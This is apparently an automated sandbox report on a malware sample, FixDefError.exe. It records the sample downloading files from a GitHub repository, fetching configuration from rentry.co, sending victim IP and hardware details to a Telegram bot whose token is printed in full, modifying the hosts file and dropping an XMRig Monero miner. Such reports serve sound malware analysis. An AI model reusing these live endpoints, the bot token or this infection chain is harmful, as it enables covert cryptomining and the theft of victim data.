Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.comlic;
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.comlicz
Source: FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.comu
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.de
Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.de-
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: FixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deF
Source: FixDefError.exe, 00000000.00000003.255774071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255760781.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255805257.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255784198.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.dea
Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.dei
Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deu
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org8:
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys
Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com4
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.comD8
Source: powershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com4
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://render.githubusercontent.com
Source: RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co
Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlig/raw
Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co4
Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322908815.000001CFFD83B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: svhost.exe.1.dr String found in binary or memory: https://xmrig.com/benchmark/%s
Source: svhost.exe.1.dr String found in binary or memory: https://xmrig.com/docs/algorithms
Source: svhost.exe.1.dr String found in binary or memory: https://xmrig.com/wizard
Source: svhost.exe.1.dr String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: www.google.com
Source: global traffic HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1User-Agent: Mozilla/5.0Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.co
Source: global traffic HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: sslproxydump.pcap, type: PCAP Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: sslproxydump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Uses powercfg.exe to modify the power settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Yara signature match
Source: sslproxydump.pcap, type: PCAP Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: sslproxydump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Detected potential crypto function
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D8989 0_2_011D8989
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1649 0_2_011D1649
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D7918 0_2_011D7918
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1E98 0_2_011D1E98
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D052D 0_2_011D052D
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D073A 0_2_011D073A
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D27B2 0_2_011D27B2
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D07EB 0_2_011D07EB
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D0600 0_2_011D0600
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D06DD 0_2_011D06DD
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D094F 0_2_011D094F
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D0818 0_2_011D0818
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D08BC 0_2_011D08BC
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D3308 0_2_011D3308
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1250 0_2_011D1250
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1240 0_2_011D1240
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D32F8 0_2_011D32F8
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D7534 0_2_011D7534
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D34B8 0_2_011D34B8
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D17C8 0_2_011D17C8
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1903 0_2_011D1903
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D19B5 0_2_011D19B5
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1800 0_2_011D1800
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1B5F 0_2_011D1B5F
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1BAC 0_2_011D1BAC
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D7C0E 0_2_011D7C0E
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1C47 0_2_011D1C47
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_011D1CD6 0_2_011D1CD6
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_084ED008 0_2_084ED008
Source: C:\Users\user\Desktop\FixDefError.exe Code function: 0_2_084ECFE6 0_2_084ECFE6
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F7C1D8 1_2_00F7C1D8
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F70BF0 1_2_00F70BF0
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F76F9C 1_2_00F76F9C
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F710C0 1_2_00F710C0
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F7BA20 1_2_00F7BA20
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F77D90 1_2_00F77D90
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F7BD80 1_2_00F7BD80
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F7C5E8 1_2_00F7C5E8
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F728D0 1_2_00F728D0
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F728C2 1_2_00F728C2
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F7CA40 1_2_00F7CA40
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F70B47 1_2_00F70B47
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F710B0 1_2_00F710B0
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F733C8 1_2_00F733C8
